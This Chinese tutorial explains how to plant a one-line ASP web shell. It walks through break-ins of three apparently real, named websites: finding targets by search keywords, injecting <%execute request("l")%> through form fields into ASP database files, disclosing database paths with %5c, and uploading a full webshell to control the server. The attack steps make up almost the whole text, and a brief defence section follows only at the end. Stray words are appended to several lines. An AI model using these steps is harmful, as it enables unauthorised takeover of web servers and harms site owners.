一句話木馬使用方法總結

「EASYNEWS新聞管理系統 v1.01 正式版」是在企業網站中很是常見的一套整站模版,在該網站系統的留言本組件中就存在着數據過濾不嚴漏洞,若是網站是默認路徑和默認文件名安裝的話,入侵者能夠利用該漏洞直接上傳ASP木馬程序控制整個網站服務器。
Step1 搜索入侵目標shell

    使用了「EASYNEWS新聞管理系統 v1.01 正式版」的網站,在網站頁面的底部版權聲明處,每每會有關鍵字符爲「WWW.52EASY.COM 版權全部」。只要在GOOGLE或百度中以該字符串爲關鍵詞進行搜索,就能夠找到大量的入侵目標。數據庫

Step2 檢測入侵條件瀏覽器

    在這裏,咱們以網站「http://www.qswtj.com/news/index.htm」爲例進行一次入侵檢測。「EASYNEWS新聞管理系統」網站的留言本數據庫文件默認是位於「\ebook\db\ebook.asp」,首先在瀏覽器地址欄中輸入「http://www.qswtj.com/news/ebook/db/ebook.asp」,回車後在瀏覽器頁面中將顯示訪問留言本數據庫文件的返回信息。若是在頁面中顯示亂碼,則說明該網站的留言本數據庫文件沒有更名,能夠進行入侵。安全

Step3 在數據庫中插入ASP後門服務器

    前面提到了該新聞系統的留言本插件存在過濾不嚴,所以咱們能夠經過提交發言,在數據庫中插入「一句話木馬」服務端代碼:網站

    在瀏覽器中訪問「http://www.qswtj.com/news/khly.htm」,打開提交留言頁面。在提交頁面中的「主頁」欄中,直接填寫「一句話木馬」服務端代碼,其它隨便填寫。肯定後點擊「發表留言」按鈕,文章發表成功後,便可將「一句話木馬」服務端代碼插入到留言本數據庫中了。ui

Step4 鏈接後門上傳Webshell.net

    因爲留言本數據庫文件「ebook.asp」是一個ASP文件,因此咱們插入到數據庫文件中的ASP語句將會被執行。將「一句話木馬」客戶端中的提交地址改成留言本數據庫文件地址,而後用瀏覽器打開客戶端,在上方的輸入框中輸入上傳ASP木馬的保存路徑,在下面的輸入框中能夠粘貼入其它的ASP木馬代碼,這裏選擇的是桂林老兵網站管理助手ASP代碼。點擊提交按鈕後,剛纔粘貼的ASP木馬將被寫入到論壇服務器中保存。插件

Step5 打開WEBSHELLhtm

    上傳的ASP木馬被保存到與數據庫文件同一WEB目錄下,文件名爲「temp.asp」,所以咱們在IE瀏覽器中打開頁面「http://www.qswtj.com/news/ebook/db/temp.asp」,輸入默認的密碼「gxgl.com」,就能夠看到一個WEBSHELL了。

    在Webshell中能夠上傳其它的文件或者安裝木馬後門、執行各類命令等,網站的服務器已經掌握在咱們的手中,能夠隨心所欲了。

實例二 「社區超市」入侵動網論壇

Step1 檢測入侵條件

    以入侵論壇「http://www.bbsok.com/」爲例。首先在瀏覽器地址欄中輸入「http://www.bbsok.com/data/shop.asp」,回車後在瀏覽器頁面中將顯示訪問"shop.asp"文件的返回信息。說明該論壇的社區超市數據庫文件沒有更名或刪除,能夠進行入侵。

Step2 在數據庫中插入ASP後門

    登陸論壇後,點擊頁面中的「娛樂」→「社區超市」,打開社區超市頁面。在該頁面中選擇商店申請,打開「商店申請入駐」頁面「http://www.bbsok.com/z_shop_newshop.asp」,在頁面中填寫任意信息,注意在「商店招牌」欄中,添加剛纔的ASP代碼"〈%execute request("l")%〉"。肯定後點擊「申請」按鈕進行提交,便可將ASP代碼保存在數據庫文件中了。

    後面的步驟就與上面介紹的同樣了,只須要用藍屏木馬鏈接數據庫文件「http://sdoygb.w2.dvbbs.net/data/shop.asp」,而後上傳WEBSHELL就能夠控制論壇服務器了。

實例三 「一句話木馬」入侵未知網站

    從上面的兩個例子,咱們能夠看出利用「一句話木馬」入侵控制存在數據庫過濾不嚴漏洞的網站,成功的前提是必定要知道網站的數據庫地址。對於一些使用了未知網頁程序的網站,咱們如何才能找到它的數據庫地址呢?這就要結合暴庫或者跨站之類的方法了,下面只是結合一個簡單的暴庫,介紹一下利用一句話木馬入侵未知網站的方法。

Step1 暴庫獲得數據庫路徑

    以「http://bbs.dwself.com」爲例。在瀏覽器中打開「http://bbs.dwself.com/join/listall.asp?bid=2」,將地址欄中join後的/改成%5c,在提交後的返回返回信息中能夠看到網站數據庫地址:「’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’」,數據庫文件名中加入了「#」符號,「#」符號在IE中執行時被解釋爲中斷符,要訪問該數據庫文件則必須將「#」號變爲「23%」才能夠。所以數據庫文件的實際WEB地址爲「http://bbs.dwself.com/join/admin/adshuilonG!%23).asp」

Step2 註冊網站,插入「一句話木馬」

    因爲數據庫文件是ASP文件格式的,知足入侵條件,所以如今咱們須要將「一句話木馬」插入到數據庫文件中去。

    在網頁上點擊註冊網站按鈕,打開註冊連接「http://bbs.dwself.com/join/add.asp?action=step3&bid=3」,在資料填寫頁面處的站點名稱或地址中寫入「一句話木馬」服務端代碼,其它隨便填寫。而後點擊完成按鈕提交數據,木馬服務端就被插入到數據庫文件中了。

    最後只須要用藍屏木馬鏈接數據庫文件「http://bbs.dwself.com/join/admin/adshuilonG!%23).asp」,而後上傳ASP木馬就能夠控制該網站的服務器了。

「一句話木馬」的防範

    要防範「一句話木馬」能夠從兩方面進行,首先是要隱藏網站的數據庫,不要讓攻擊者知道數據庫文件的連接地址。這就須要管理員在網頁程序中查被暴庫漏洞,在數據庫鏈接文件中加入容錯代碼等,具體的防暴庫方法在這裏就不做過多的講解了。

    其次就是要防止用戶提交的數據未過濾漏洞,對用戶提交的數據進行過濾,替換一些危險的代碼等。例如中國站長聯盟網站在出現該漏洞後已經對網頁程序進行的修補,插入的ASP代碼中的〈、〉和"等字符會被網頁程序轉換成其它字符,導致服務端代碼沒法正常執行。

    只要做好這兩方面的安全工做,「一句話木馬」雖然無孔不入,可是面對這樣的網站系統也是迫不得已的了。

相關文章
相關標籤/搜索